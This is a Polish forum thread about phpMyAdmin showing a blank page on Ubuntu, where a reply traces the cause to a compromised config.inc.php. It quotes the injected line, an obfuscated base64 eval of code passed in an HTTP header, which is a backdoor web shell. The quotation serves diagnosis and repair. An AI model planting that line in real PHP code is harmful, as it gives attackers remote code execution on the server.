Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> phpmyadmin problem, pusta strona
damianooo

Grupa: Zarejestrowani

Ostrzeżenie: (0%)
-----

Witam,

Pracuję na systemie Ubuntu. Od dłuższego czasu nie używałem phpmyadmina jednak teraz mam potrzebę żeby z tego korzystać w jednym projekcie. Jest jednak mały problem ponieważ odpalając stronę tak: localhost/phpmyadmin dostaję pustą stronę. Jak w konsoli loguję się do mysql-a to bez problemu łączę się z bazą danych oraz bez problemu wykonuję na niej zapytania.

Co może być nie tak ?
Go to the top of the page
+Quote Post

Start new topic
Odpowiedzi
styko

Grupa: Zarejestrowani

Ostrzeżenie: (0%)
-----

Rozwiązane. Przepraszam za zawracanie orzeszek, ale po długich poszukiwaniach udało mi się trafić na rozwiązanie.
Zastosowałem się do poniższej rady

I had this problem show up a week ago as well. I tracked it down to my /var/lib/phpmyadmin/config.inc.php file be corrupted. I had the following line in it:

$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy'

Which, when I commented out, phpmyadmin was up and running again.
Found a couple articles about the config.inc.php file being vulnerable.. so maybe it's being hacked
http://www.gnucitizen.org/blog/cve-2009 ... f-concept/

The phpmyadmin > 2.11.9.5 seems to fix this security hole, but the Ubuntu phpmyadmin seems to be 2.11.8.1, so you'll probably have to do a manual patch/install..

Z tym, że wywaliłem całkowicie config.inc.php i phpmyadmin poszedł normalnie bez problemu.
Go to the top of the page
+Quote Post

Posty w temacie

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

RSS Aktualny czas: 12.10.2025 - 13:08